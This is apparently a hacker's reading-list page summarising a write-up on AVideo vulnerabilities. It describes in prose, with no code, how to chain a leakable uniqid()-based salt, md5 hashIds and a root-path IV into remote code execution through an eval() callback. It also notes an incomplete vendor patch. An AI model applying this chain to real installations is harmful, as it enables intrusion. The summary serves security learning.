Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

AVideo is an open-source audio/video platform to create video-sharing websites, similar to YouTube, written in PHP. The information within an encrypted payload is assumed to be secure. For this reason, the project included a callback() parameter in the encrypted payload that triggered an eval(). So, if you could somehow get valid data to be decrypted, you'd get an RCE.

The encryption uses AES-256-CBC under the hood, where the key is a value known as the salt. Despite a change several years ago to fix this, legacy salt generation was kept around via the uniqid() command, which simply returns the machine's microseconds since installation. This timestamp can be leaked by inspecting the default categories in the setup.

Still, online brute forcing of the microseconds of the salt sucks. So, they decided to find an offline version. Each video exposes a hashId that is computed via md5(salt). Since all the information is public except the salt, we can compute hashes with different salts until we find the matching one. This allows us to leak salt.

The encrypt_decrypt() function uses the system root path as the IV. Either via educated guesses or using the the leaked posterPortraitPath from another API, this can be figured out. With the salt known and the RCE path identified, we can execute RCE on the machine. Pretty neat!

Besides this, they found that file uploads and deletions could be performed without authentication, and that an open redirect resulted from a lack of domain validation. Additionally, there were several IDORs from simple missing ownership checks.

The vendor said all issues had been patched. However, the critical RCE issue and everything surrounding it were not. Notably, the salt could still be leaked, and the eval() callback remained.

At the end of the article, they have a few good takeaways. First, if fallback mechanisms are available, they can still be exploited. Second, the more information you provide to an attacker, the more likely they are to have all of the pieces to the puzzle for exploitation. Finally, always check the patches for vulnerabilities; they are often not done properly. Great bugs!